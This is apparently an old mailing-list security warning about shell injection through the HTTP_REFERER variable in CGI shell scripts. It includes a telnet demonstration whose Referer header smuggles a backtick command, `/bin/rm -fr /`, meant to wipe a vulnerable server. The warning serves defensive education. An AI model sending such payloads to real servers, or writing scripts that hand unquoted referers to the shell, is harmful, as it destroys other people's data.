I've posted a similar message like this some time ago, but I'll repeat
it again since I've been confronted with it again myself:
using the HTTP_REFERER variable (a variable made available to
cgi-scripts by many httpd's) in shell-scripts must be done with extreme
It is very easy to 'make' a HTTP_REFERER containing commands and
characters which are interpreted by the shell parsing it. If no special
care is taken to prevent this, a site can be vulnerable to certain *
To see how easy it is to play around with this:
$ telnet some.site 80
Connected to some.site.
Escape character is '^]'.
-GET /~some_dir/vulnerable.script HTTP/1.0
-Referer:"`/bin/rm -fr /`"
Lines starting with '-' are entered by the hacker.
If vulnerable.script contains something like 'if [ $HTTP_REFERER ]..',
you might be in trouble.